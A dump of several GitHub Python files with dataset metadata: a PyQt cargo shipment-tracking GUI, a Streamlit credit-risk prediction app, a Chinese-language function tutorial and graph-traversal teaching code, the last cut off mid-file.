self.typeShipment.currentTextChanged.connect(self.AircompanyTextCombo)\n\n self.horizontalLayout.addWidget(self.typeShipment)\n\n self.airCompanyList = ['Air France','Air Royal','Ethiopian','Turkish Airlines','DHL','FedEx','UPS Air Cargo','EgyptAir','British Airways']\n self.seaCompanyList = ['Mediterranean Shipping Company (MSC)','Maers','CMA CGM','COSCO','Hapag-Lloyd','Pacific International Lines (PIL)']\n self.companiesBox = QComboBox(self)\n self.companiesBox.setObjectName(u\"companiesBox\")\n self.companiesBox.setMinimumSize(QSize(200, 30))\n self.companiesBox.currentTextChanged.connect(self.airCompanyAWB)\n\n self.horizontalLayout.addWidget(self.companiesBox)\n\n self.pushButton = QPushButton(self)\n self.pushButton.setObjectName(u\"pushButton\")\n self.pushButton.setMinimumSize(QSize(0, 30))\n self.pushButton.setCursor(QCursor(Qt.PointingHandCursor))\n self.pushButton.clicked.connect(self.commit)\n\n self.horizontalLayout.addWidget(self.pushButton)\n\n\n self.verticalLayout.addLayout(self.horizontalLayout)\n\n self.groupBox = QGroupBox(self)\n self.groupBox.setObjectName(u\"groupBox\")\n self.verticalLayout_4 = QVBoxLayout(self.groupBox)\n self.verticalLayout_4.setObjectName(u\"verticalLayout_4\")\n self.verticalLayout_4.setContentsMargins(-1, -1, -1, 0)\n self.verticalLayout_3 = QVBoxLayout()\n self.verticalLayout_3.setObjectName(u\"verticalLayout_3\")\n self.horizontalLayout_3 = QHBoxLayout()\n self.horizontalLayout_3.setObjectName(u\"horizontalLayout_3\")\n self.verticalLayout_11 = QVBoxLayout()\n self.verticalLayout_11.setObjectName(u\"verticalLayout_11\")\n self.typeLab = QLabel(self.groupBox)\n self.typeLab.setObjectName(u\"typeLab\")\n font1 = QFont()\n font1.setPointSize(10)\n font1.setBold(True)\n font1.setWeight(75)\n self.typeLab.setFont(font1)\n self.typeLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_11.addWidget(self.typeLab)\n\n self.typeTextLab = QLabel(self.groupBox)\n self.typeTextLab.setObjectName(u\"typeTextLab\")\n self.typeTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_11.addWidget(self.typeTextLab)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_11)\n\n self.verticalLayout_10 = QVBoxLayout()\n self.verticalLayout_10.setObjectName(u\"verticalLayout_10\")\n self.qtyLabe = QLabel(self.groupBox)\n self.qtyLabe.setObjectName(u\"qtyLabe\")\n self.qtyLabe.setFont(font1)\n self.qtyLabe.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_10.addWidget(self.qtyLabe)\n\n self.qtyTextLab = QLabel(self.groupBox)\n self.qtyTextLab.setObjectName(u\"qtyTextLab\")\n self.qtyTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_10.addWidget(self.qtyTextLab)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_10)\n\n self.verticalLayout_12 = QVBoxLayout()\n self.verticalLayout_12.setObjectName(u\"verticalLayout_12\")\n self.weightLab = QLabel(self.groupBox)\n self.weightLab.setObjectName(u\"weightLab\")\n self.weightLab.setFont(font1)\n self.weightLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_12.addWidget(self.weightLab)\n\n self.weightTextLab = QLabel(self.groupBox)\n self.weightTextLab.setObjectName(u\"weightTextLab\")\n self.weightTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_12.addWidget(self.weightTextLab)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_12)\n\n self.verticalLayout_8 = QVBoxLayout()\n self.verticalLayout_8.setObjectName(u\"verticalLayout_8\")\n self.originLab = QLabel(self.groupBox)\n self.originLab.setObjectName(u\"originLab\")\n self.originLab.setFont(font1)\n self.originLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_8.addWidget(self.originLab)\n\n self.originTextLab = QLabel(self.groupBox)\n self.originTextLab.setObjectName(u\"originTextLab\")\n self.originTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_8.addWidget(self.originTextLab)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_8)\n\n self.verticalLayout_7 = QVBoxLayout()\n self.verticalLayout_7.setObjectName(u\"verticalLayout_7\")\n self.destinaLab = QLabel(self.groupBox)\n self.destinaLab.setObjectName(u\"destinaLab\")\n self.destinaLab.setFont(font1)\n self.destinaLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_7.addWidget(self.destinaLab)\n\n self.destinaTextLab = QLabel(self.groupBox)\n self.destinaTextLab.setObjectName(u\"destinaTextLab\")\n self.destinaTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_7.addWidget(self.destinaTextLab)\n\n\n self.horizontalLayout_3.addLayout(self.verticalLayout_7)\n\n self.horizontalLayout_3.setStretch(0, 1)\n self.horizontalLayout_3.setStretch(1, 1)\n self.horizontalLayout_3.setStretch(2, 1)\n self.horizontalLayout_3.setStretch(3, 2)\n self.horizontalLayout_3.setStretch(4, 2)\n\n self.verticalLayout_3.addLayout(self.horizontalLayout_3)\n\n self.line = QFrame(self.groupBox)\n self.line.setObjectName(u\"line\")\n self.line.setFrameShape(QFrame.HLine)\n self.line.setFrameShadow(QFrame.Sunken)\n\n self.verticalLayout_3.addWidget(self.line)\n\n self.horizontalLayout_5 = QHBoxLayout()\n self.horizontalLayout_5.setObjectName(u\"horizontalLayout_5\")\n self.verticalLayout_14 = QVBoxLayout()\n self.verticalLayout_14.setObjectName(u\"verticalLayout_14\")\n self.PODLab = QLabel(self.groupBox)\n self.PODLab.setObjectName(u\"PODLab\")\n font2 = QFont()\n font2.setBold(True)\n font2.setWeight(75)\n self.PODLab.setFont(font2)\n\n self.verticalLayout_14.addWidget(self.PODLab)\n\n self.PODTextLab = QLabel(self.groupBox)\n self.PODTextLab.setObjectName(u\"PODTextLab\")\n\n self.verticalLayout_14.addWidget(self.PODTextLab)\n\n\n self.horizontalLayout_5.addLayout(self.verticalLayout_14)\n\n self.verticalLayout_13 = QVBoxLayout()\n self.verticalLayout_13.setObjectName(u\"verticalLayout_13\")\n self.POALab = QLabel(self.groupBox)\n self.POALab.setObjectName(u\"POALab\")\n self.POALab.setFont(font2)\n\n self.verticalLayout_13.addWidget(self.POALab)\n\n self.POATextLab = QLabel(self.groupBox)\n self.POATextLab.setObjectName(u\"POATextLab\")\n\n self.verticalLayout_13.addWidget(self.POATextLab)\n\n\n self.horizontalLayout_5.addLayout(self.verticalLayout_13)\n\n self.verticalLayout_15 = QVBoxLayout()\n self.verticalLayout_15.setObjectName(u\"verticalLayout_15\")\n self.ship_Flight_Lab = QLabel(self.groupBox)\n self.ship_Flight_Lab.setObjectName(u\"ship_Flight_Lab\")\n self.ship_Flight_Lab.setFont(font2)\n\n self.verticalLayout_15.addWidget(self.ship_Flight_Lab)\n\n self.ship_Flight_Text_Lab = QLabel(self.groupBox)\n self.ship_Flight_Text_Lab.setObjectName(u\"ship_Flight_Text_Lab\")\n\n self.verticalLayout_15.addWidget(self.ship_Flight_Text_Lab)\n\n\n self.horizontalLayout_5.addLayout(self.verticalLayout_15)\n\n\n self.verticalLayout_3.addLayout(self.horizontalLayout_5)\n\n\n self.verticalLayout_4.addLayout(self.verticalLayout_3)\n\n self.line_2 = QFrame(self.groupBox)\n self.line_2.setObjectName(u\"line_2\")\n self.line_2.setFrameShape(QFrame.HLine)\n self.line_2.setFrameShadow(QFrame.Sunken)\n\n self.verticalLayout_4.addWidget(self.line_2)\n\n self.horizontalLayout_6 = QHBoxLayout()\n self.horizontalLayout_6.setObjectName(u\"horizontalLayout_6\")\n self.verticalLayout_18 = QVBoxLayout()\n self.verticalLayout_18.setObjectName(u\"verticalLayout_18\")\n self.ATDLabe = QLabel(self.groupBox)\n self.ATDLabe.setObjectName(u\"ATDLabe\")\n self.ATDLabe.setFont(font1)\n self.ATDLabe.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_18.addWidget(self.ATDLabe)\n\n self.ATDTextLab = QLabel(self.groupBox)\n self.ATDTextLab.setObjectName(u\"ATDTextLab\")\n self.ATDTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_18.addWidget(self.ATDTextLab)\n\n\n self.horizontalLayout_6.addLayout(self.verticalLayout_18)\n\n self.verticalLayout_17 = QVBoxLayout()\n self.verticalLayout_17.setObjectName(u\"verticalLayout_17\")\n self.ETALab = QLabel(self.groupBox)\n self.ETALab.setObjectName(u\"ETALab\")\n self.ETALab.setFont(font1)\n self.ETALab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_17.addWidget(self.ETALab)\n\n self.ETATextLab = QLabel(self.groupBox)\n self.ETATextLab.setObjectName(u\"ETATextLab\")\n self.ETATextLab.setAlignment(Qt.AlignCenter)\n\n self.ctn = QComboBox(self.groupBox)\n \n self.verticalLayout_17.addWidget(self.ETATextLab)\n\n\n self.horizontalLayout_6.addLayout(self.verticalLayout_17)\n\n self.verticalLayout_16 = QVBoxLayout()\n self.verticalLayout_16.setObjectName(u\"verticalLayout_16\")\n self.ATALab = QLabel(self.groupBox)\n self.ATALab.setObjectName(u\"ATALab\")\n self.ATALab.setFont(font1)\n self.ATALab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_16.addWidget(self.ATALab)\n\n self.ATATextLab = QLabel(self.groupBox)\n self.ATATextLab.setObjectName(u\"ATATextLab\")\n self.ATATextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_16.addWidget(self.ATATextLab)\n\n\n self.horizontalLayout_6.addLayout(self.verticalLayout_16)\n\n self.verticalLayout_19 = QVBoxLayout()\n self.verticalLayout_19.setObjectName(u\"verticalLayout_19\")\n self.CurrentPLab = QLabel(self.groupBox)\n self.CurrentPLab.setObjectName(u\"CurrentPLab\")\n self.CurrentPLab.setFont(font1)\n self.CurrentPLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_19.addWidget(self.CurrentPLab)\n\n self.currentPTextLab = QLabel(self.groupBox)\n self.currentPTextLab.setObjectName(u\"currentPTextLab\")\n self.currentPTextLab.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout_19.addWidget(self.currentPTextLab)\n\n\n self.horizontalLayout_6.addLayout(self.verticalLayout_19)\n\n\n self.verticalLayout_4.addLayout(self.horizontalLayout_6)\n\n self.verticalSpacer_2 = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n\n self.verticalLayout_4.addItem(self.verticalSpacer_2)\n\n self.horizontalLayout_7 = QHBoxLayout()\n self.horizontalLayout_7.setObjectName(u\"horizontalLayout_7\")\n self.horizontalSpacer = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)\n self.horizontalLayout_7.addWidget(self.ctn)\n \n self.horizontalLayout_7.addItem(self.horizontalSpacer)\n\n self.moreButton = QPushButton(self.groupBox)\n self.moreButton.setObjectName(u\"moreButton\")\n self.moreButton.setCursor(QCursor(Qt.PointingHandCursor))\n\n self.horizontalLayout_7.addWidget(self.moreButton)\n self.horizontalLayout_7.setStretch(0,2)\n self.horizontalLayout_7.setStretch(1,1)\n self.horizontalLayout_7.setStretch(2,1)\n\n self.verticalLayout_4.addLayout(self.horizontalLayout_7)\n\n self.verticalLayout_4.setStretch(0, 1)\n self.verticalLayout_4.setStretch(1, 1)\n self.verticalLayout_4.setStretch(4, 1)\n\n self.verticalLayout.addWidget(self.groupBox)\n\n self.horizontalLayout_8 = QHBoxLayout()\n self.horizontalLayout_8.setObjectName(u\"horizontalLayout_8\")\n self.exportPDF = QPushButton(self)\n self.exportPDF.setObjectName(u\"exportPDF\")\n self.exportPDF.setCursor(QCursor(Qt.PointingHandCursor))\n\n self.horizontalLayout_8.addWidget(self.exportPDF)\n\n self.printButton = QPushButton(self)\n self.printButton.setObjectName(u\"printButton\")\n self.printButton.setCursor(QCursor(Qt.PointingHandCursor))\n\n self.horizontalLayout_8.addWidget(self.printButton)\n\n self.trackFlight = QPushButton(self)\n self.trackFlight.setObjectName(u\"trackFlight\")\n self.trackFlight.setCursor(QCursor(Qt.PointingHandCursor))\n\n self.horizontalLayout_8.addWidget(self.trackFlight)\n\n\n self.verticalLayout.addLayout(self.horizontalLayout_8)\n\n self.verticalLayout.setStretch(2, 3)\n\n self.verticalLayout_2.addLayout(self.verticalLayout)\n self.AWB_list = \"\"\n\n\n self.retranslateUi()\n\n self.typeShipment.setCurrentIndex(0)\n \n def textChamps(self):\n self.AWB_list = self.trackingNumberLine.text()\n if self.AWB_list[:3] == '071':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('Ethiopian')\n if self.AWB_list[:3] == '057':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('Air France')\n if self.AWB_list[:3] == '235':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('Turkish Airlines')\n if self.AWB_list[:3] == '406':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('UPS Air Cargo')\n if self.AWB_list[:3] == '423':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('DHL')\n if self.AWB_list[:3] == '023':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('FedEx')\n if self.AWB_list[:3] == '077':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('EgyptAir')\n if self.AWB_list[:3] == '125':\n self.typeShipment.setCurrentText('Air')\n self.companiesBox.setCurrentText('British Airways')\n def AircompanyTextCombo(self):\n self.companiesBox.clear()\n if self.typeShipment.currentText() == \"Air\":\n self.companiesBox.addItems(sorted(self.airCompanyList,reverse=False))\n elif self.typeShipment.currentText() == \"Sea\":\n self.companiesBox.addItems(sorted(self.seaCompanyList, reverse=False))\n def airCompanyAWB(self):\n if self.companiesBox.currentText() == \"Air France\":\n air[\"Air France\"] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == \"Air Royal\":\n air['Air Royal'] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == \"DHL\":\n air['DHL'] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == \"FedEx\":\n air['FedEx'] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == 'Ethiopian':\n air['Ethiopian'] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == \"Turkish Airlines\":\n air['Turkish Airlines'] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == 'UPS Air Cargo':\n air['UPS Air Cargo'] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == 'UPS Air Cargo':\n air['EgyptAir'] = self.trackingNumberLine.text()\n if self.companiesBox.currentText() == 'British Airways':\n air['British Airways'] = self.trackingNumberLine.text()\n def commit(self):\n if self.typeShipment.currentText() == 'Air':\n self.typeTextLab.setText(\"Pieces\")\n if self.companiesBox.currentText() == \"Ethiopian\":\n airCargoTrack.ethiopian(air['Ethiopian'])\n self.originTextLab.setText(airCargoTrack.ethiopian.resultFonction()[0])\n self.destinaTextLab.setText(airCargoTrack.ethiopian.resultFonction()[1])\n self.qtyTextLab.setText(airCargoTrack.ethiopian.resultFonction()[4])\n self.weightTextLab.setText(airCargoTrack.ethiopian.resultFonction()[5])\n self.currentPTextLab.setText(airCargoTrack.ethiopian.resultFonction()[6])\n self.ship_Flight_Text_Lab.setText(airCargoTrack.ethiopian.resultFonction()[2])\n if airCargoTrack.ethiopian.resultFonction()[-1] == True:\n self.ATATextLab.setText(airCargoTrack.ethiopian.resultFonction()[3])\n else:\n self.ETATextLab.setText(airCargoTrack.ethiopian.resultFonction()[3])\n if self.companiesBox.currentText() == \"Mediterranean Shipping Company (MSC)\":\n seaCargoTrack.msc(self.trackingNumberLine.text())\n self.originTextLab.setText(seaCargoTrack.msc.getGeneralInfo()[0])\n self.destinaTextLab.setText(seaCargoTrack.msc.getGeneralInfo()[1])\n\n # setupUi\n\n def retranslateUi(self):\n self.setWindowTitle(QCoreApplication.translate(\"self\", u\"self\", None))\n self.title.setText(QCoreApplication.translate(\"self\", u\"SHIPMENTS TRACKING\", None))\n self.searchIco.setText(\"\")\n self.trackingNumberLine.setPlaceholderText(QCoreApplication.translate(\"self\", u\"Tracking Number here\", None))\n self.typeShipment.setItemText(0, QCoreApplication.translate(\"self\", u\"Select a mode...\", None))\n self.typeShipment.setItemText(1, QCoreApplication.translate(\"self\", u\"Air\", None))\n self.typeShipment.setItemText(2, QCoreApplication.translate(\"self\", u\"Sea\", None))\n\n self.typeShipment.setPlaceholderText(QCoreApplication.translate(\"self\", u\"Sele\", None))\n self.pushButton.setText(QCoreApplication.translate(\"self\", u\"Commit\", None))\n self.groupBox.setTitle(QCoreApplication.translate(\"self\", u\"Result\", None))\n self.typeLab.setText(QCoreApplication.translate(\"self\", u\"TYPE\", None))\n self.typeTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.qtyLabe.setText(QCoreApplication.translate(\"self\", u\"QTY\", None))\n self.qtyTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.weightLab.setText(QCoreApplication.translate(\"self\", u\"Weight\", None))\n self.weightTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.originLab.setText(QCoreApplication.translate(\"self\", u\"Origin\", None))\n self.originTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.destinaLab.setText(QCoreApplication.translate(\"self\", u\"Destination\", None))\n self.destinaTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.PODLab.setText(QCoreApplication.translate(\"self\", u\"Port of Departure\", None))\n self.PODTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.POALab.setText(QCoreApplication.translate(\"self\", u\"Port of Arrival\", None))\n self.POATextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.ship_Flight_Lab.setText(QCoreApplication.translate(\"self\", u\"Ship / Flight\", None))\n self.ship_Flight_Text_Lab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.ATDLabe.setText(QCoreApplication.translate(\"self\", u\"ATD\", None))\n self.ATDTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.ETALab.setText(QCoreApplication.translate(\"self\", u\"ETA\", None))\n self.ETATextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.ATALab.setText(QCoreApplication.translate(\"self\", u\"ATA\", None))\n self.ATATextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.CurrentPLab.setText(QCoreApplication.translate(\"self\", u\"Current Position\", None))\n self.currentPTextLab.setText(QCoreApplication.translate(\"self\", u\"N/A\", None))\n self.moreButton.setText(QCoreApplication.translate(\"self\", u\"More\", None))\n self.exportPDF.setText(QCoreApplication.translate(\"self\", u\"Export PDF\", None))\n self.printButton.setText(QCoreApplication.translate(\"self\", u\"Print\", None))\n self.trackFlight.setText(QCoreApplication.translate(\"self\", u\"Track Ship/Flight\", None))\n # retranslateUi\n\nclass mainWin(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Shipments Tracking\")\n self.resize(675,423)\n ico = QIcon(\"img/icon.png\")\n self.setWindowIcon(ico)\n self.setCentralWidget(Ui_self())\n self.show()\n\nif __name__ == \"__main__\":\n App = QApplication(sys.argv)\n win = mainWin()\n sys.exit(App.exec())","repo_name":"hashtag91/SeaShipmentTracker","sub_path":"SST_Gui.py","file_name":"SST_Gui.py","file_ext":"py","file_size_in_byte":23551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"18601142295","text":"import streamlit as st\nimport joblib\nfrom datetime import date, timedelta\nfrom sklearn.preprocessing import LabelEncoder\n\n# Load the saved model\nmodel = joblib.load('deployment/credit_risk_model.pkl')\n\n# Create the Streamlit app\ndef main():\n # Set page configuration\n st.set_page_config(page_title='Credit Risk Model Deployment', layout='wide')\n\n # Add custom CSS styles\n st.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True\n )\n\n st.title('Credit Risk Model Deployment')\n st.write('Enter the required features below:')\n\n # Create input fields for the required features\n birthdate = st.number_input('Age', min_value=18, max_value=100, step=1)\n latitude_gps = st.number_input('Latitude GPS')\n longitude_gps = st.number_input('Longitude GPS')\n bank_name_clients = st.text_input('Name of the bank', \"GT Bank\", key = \"placeholder\")\n loannumber = st.number_input('The number of the loan that you have to predict')\n creation_day = st.number_input('Day that loan application is created (1-31)', min_value=1, max_value=31)\n approved_day = st.number_input('Day that loan is approved (1-31))', min_value=1, max_value=31)\n creation_dayofweek = st.number_input('Creation weekday (1-7)', min_value=1, max_value=7)\n approved_dayofweek = st.number_input('Approved weekday (1-7)', min_value=1, max_value=7)\n totaldue = st.number_input('Total repayment required to settle the loan', min_value=20.0, value=20.0, format='%f')\n\n # ... add more input fields for other features\n\n # Create a button to make predictions\n if st.button('Predict'):\n # Encode categorical features\n label_encoder = LabelEncoder()\n bank_name_clients_encoded = label_encoder.fit_transform([bank_name_clients])\n\n # Create a data sample with the user inputs\n sample = [[birthdate, latitude_gps, longitude_gps, bank_name_clients_encoded[0],\n loannumber, creation_day, approved_day, creation_dayofweek,\n approved_dayofweek, totaldue]]\n\n # Make predictions using the loaded model\n prediction = model.predict(sample)\n\n # Determine the loan status and corresponding CSS class for styling\n if prediction == 1:\n loan_status = 'Approved'\n status_class = 'approved'\n else:\n loan_status = 'Rejected'\n status_class = 'rejected'\n\n # Display the loan status with appropriate styling\n st.markdown(f'
    {loan_status}
    ', unsafe_allow_html=True)\n\n# Run the Streamlit app\nif __name__ == '__main__':\n main()\n","repo_name":"gbganalyst/credit-risk-prediction","sub_path":"deployment/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5034587154","text":"def my_abs(x):\n if x >= 0:\n return x\n else:\n return -x\n #在Python中,定义一个函数要使用def语句,依次写出函数名、括号、括号中的参数和冒号:,\n # 然后,在缩进块中编写函数体,函数的返回值用return语句返回。\n# 返回多个值\n\n# 函数可以返回多个值吗?答案是肯定的。\n\n# 比如在游戏中经常需要从一个点移动到另一个点,给出坐标、位移和角度,就可以计算出新的新的坐标:\n\nimport math\n\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n# import math语句表示导入math包,并允许后续代码引用math包里的sin、cos等函数。\n\n\n\n# 请定义一个函数quadratic(a, b, c),接收3个参数,返回一元二次方程:\n\n# ax2 + bx + c = 0 的两个解。 提示:计算平方根可以调用math.sqrt()函数:\n# -*- coding: utf-8 -*-\nimport math\n\ndef quadratic(a, b, c):\n d = b*b-4*a*c\n if d < 0:\n return '无解'\n else:\n x1=(math.sqrt(d)-b) / (2*a)\n x2=(-math.sqrt(d)-b) / (2*a)\n return x1,x2\nprint('quadratic(2, 3, 1) =', quadratic(2, 3, 1))\nprint('quadratic(2, 4, 2) =', quadratic(2, 4, 2))\nprint('quadratic(3, 4, 2) =', quadratic(3, 4, 2))\n\n","repo_name":"kuangtao94/TestHome","sub_path":"jiayukejian/Case/定义函数.py","file_name":"定义函数.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33987412299","text":"\"\"\"\nlets represent the nodes and edges in the graphs\nnodes are the points and edges are the connection between the points\nfor ref we can create nodes and edges using this image https://i.imgur.com/xkgMnwx.png\n\"\"\"\n\nprint(\"\\n---------------Adjacency List - Print a simple graph with node and edges--------------\\n\")\n\nnum_nodes = 5\nedges = [(0,1), (0,4), (1,2), (1,3), (1,4), (2,3),(3,4)]\n\nclass Graph:\n def __init__(self, num_nodes):\n self.num_nodes = num_nodes\n # create list of empty list \n self.list_of_nodes = [[] for _ in range(num_nodes)]\n \n def add_edge(self, node_a, node_b):\n self.list_of_nodes[node_a].append(node_b)\n self.list_of_nodes[node_b].append(node_a)\n \n def remove_edge(self, edge):\n for _, neighbour in enumerate(self.list_of_nodes):\n if neighbour == list(edge):\n self.list_of_nodes.remove(list(edge))\n \n # lets print the graph in a better way\n def display_graph(self):\n print(\n \"\\n\".join(\n [\"Node {}: Edge connected with {}\".format(\n node, neighbour) \n for node, neighbour in enumerate(\n self.list_of_nodes)])\n )\n# end of Graph class\n\nnew_graph = Graph(num_nodes)\nfor edge_a, edge_b in edges:\n new_graph.add_edge(edge_a, edge_b)\nnew_graph.display_graph()\nnew_graph.remove_edge((1,4))\nprint()\nnew_graph.display_graph()\n\nprint(\"\\n---------------Adjacency Matrix represent the nodes as 1-0 in the matrix--------------\\n\")\n\nclass GraphMatrix:\n def __init__(self, num_nodes):\n self.num_nodes = num_nodes\n # create list of empty list \n self.adj_matrix = [[0 for _ in range(num_nodes)] for _ in range(num_nodes)]\n \n def add_edge(self, node_a, node_b):\n if node_a == node_b:\n print(\"Same Node %d and %d\" % (node_a, node_b))\n # insert in the correct adj_matrix\n self.adj_matrix[node_a][node_b] = 1\n self.adj_matrix[node_b][node_a] = 1\n \n def remove_edge(self, node_a,node_b):\n if self.adj_matrix[node_a][node_b] == 0:\n print(\"No edge between %d and %d\" % (node_a, node_b))\n return\n self.adj_matrix[node_a][node_b] = 0\n self.adj_matrix[node_b][node_a] = 0\n\n # lets print the graph in a better way\n def display_graph_matrix(self):\n print('{}'.format(self.adj_matrix)) \n# end of GraphMatrix class \n\nnew_graph_matrix = GraphMatrix(num_nodes)\nfor edge_a, edge_b in edges:\n new_graph_matrix.add_edge(edge_a, edge_b)\nnew_graph_matrix.display_graph_matrix()\nnew_graph_matrix.remove_edge(1,4)\nprint()\nnew_graph_matrix.display_graph_matrix()\n\nprint(\"\\n---------------Graph traversal - breadth-first search--------------\\n\")\n\"\"\"\nBFS pseudocode:\n\n 1 procedure BFS(G, root) is\n 2 let Q be a queue\n 3 label root as discovered\n 4 Q.enqueue(root)\n 5 while Q is not empty do\n 6 v := Q.dequeue()\n 9 for all edges from v to w in G.adjacentEdges(v) do\n10 if w is not labeled as discovered then\n11 label w as discovered\n12 Q.enqueue(w)\n\"\"\"\n\ndef breadth_first_search(graph, root):\n queue = []\n data = graph.list_of_nodes\n discovered = [False] * len(data)\n distance = [None] * len(data)\n parent = [None] * len(data)\n\n discovered[root] = True\n distance[root] = 0\n queue.append(root)\n connected = True\n # to dequeue the list we will have an index which will track the first \n # element in the queues list\n idx = 0\n\n while idx < len(queue):\n # get most recently inserted element in the queue, dequeue operation\n current = queue[idx]\n # as we got the current/discovered value in the queue increment the index\n idx += 1 \n # check all the edges of the current node\n # for example the root/current is 0 then data[current] will be [1,4] \n for node in data[current]:\n # yet to discover, so here 0 is discovered but not 1 (node) from [1,4]\n if not discovered[node]:\n # current nodes distance is 1 + self\n distance[node] = 1 + distance[current]\n # Parent node will be current as it is not discovered yet\n parent[node] = current\n # so we can set the note as discovered \n discovered[node] = True\n # and append the node in queue\n queue.append(node)\n \n # check if the graph is connected or not\n if len(queue) < len(data):\n connected = False\n\n return queue, distance, parent, connected\n# end of breadth_first_search()\n\n# uncomment to test the all nodes connected scenario \n# num_nodes = 9\n# edges = [(0, 1), (0, 3), (1, 2), (2, 3), (4, 5), (4, 6), (5, 6), (7, 8)]\nnew_graph = Graph(num_nodes)\nfor edge_a, edge_b in edges:\n new_graph.add_edge(edge_a, edge_b)\nnew_graph.display_graph()\n\nroot = 3\nedges, distance, parent, connected = breadth_first_search(new_graph, root)\nprint(f\"\\nThe {root} has {edges} nodes associated, \\\ndistance (order of nodes) is {distance} and \\\nthe parent (order of nodes) is {parent}. Is the graph connected? {connected}.\")\n\nprint(\"\\n--Get the componentes which are connected in a graph--\\n\")\n\ndef is_component_util(graph, node, discovered, connected_graph_edge):\n # If the node/neighbour is not discovered mark it discovered \n discovered[node] = True\n # append the node/neighbour in the list\n connected_graph_edge.append(node)\n # if node = 0 so in a graph like [[0,1],[1,2], [3]], the graph[node]=[0,1] \n # so value of neighbour will be 0 then 1 then 1 then 2 \n for neighbour in graph[node]: \n # only discover if the neighbour is not discovered\n if not discovered[neighbour]: \n is_component_util(graph, neighbour, discovered, connected_graph_edge)\n\ndef bfs_component_connected(graph, num_nodes):\n discovered = [False] * num_nodes\n components = []\n\n # iterate over the range of num_nudes\n for node in range(num_nodes):\n if not discovered[node]:\n connected_graph_edge = []\n is_component_util(graph, node, discovered, connected_graph_edge)\n # here the list of connected nodes will be appended\n components.append(connected_graph_edge)\n \n return components\n# end of bfs_component_connected\n\nresult = bfs_component_connected(new_graph.list_of_nodes, num_nodes)\nprint(\"List of connected components in graph:\", result)\n\n\nprint(\"\\n---------------Graph traversal - depth-first search--------------\\n\")\n\"\"\"\nQuestion: Define a class to represent weighted and directed graphs in Python.\n\"\"\"\n\nclass DepthGraph:\n def __init__(self, num_nodes, edges, directed=False, weighted=False):\n self.num_nodes = num_nodes\n self.directed = directed\n self.weighted = weighted\n self.data = [[] for _ in range(num_nodes)]\n self.weight = [[] for _ in range(num_nodes)]\n \n for edge in edges:\n if self.weighted:\n # include weights\n node_a, node_b, weight = edge\n # pair the nodes_b with node_a\n self.data[node_a].append(node_b)\n # pair the weight with node_a\n self.weight[node_a].append(weight)\n if not directed:\n self.data[node_b].append(node_a)\n self.weight[node_b].append(weight)\n else:\n # work without weights\n node_a, node_b = edge\n self.data[node_a].append(node_b)\n if not directed:\n self.data[node_b].append(node_a)\n\n def __repr__(self) -> str:\n result = \"\"\n if self.weighted:\n for i, (nodes, weights) in enumerate(zip(self.data, self.weight)):\n result += \"{}:{}\\n\".format(i, list(zip(nodes, weights)))\n else:\n for i, nodes in enumerate(self.data):\n result += \"{}:{}\\n\".format(i, nodes)\n return result\n \n def __str__(self):\n return 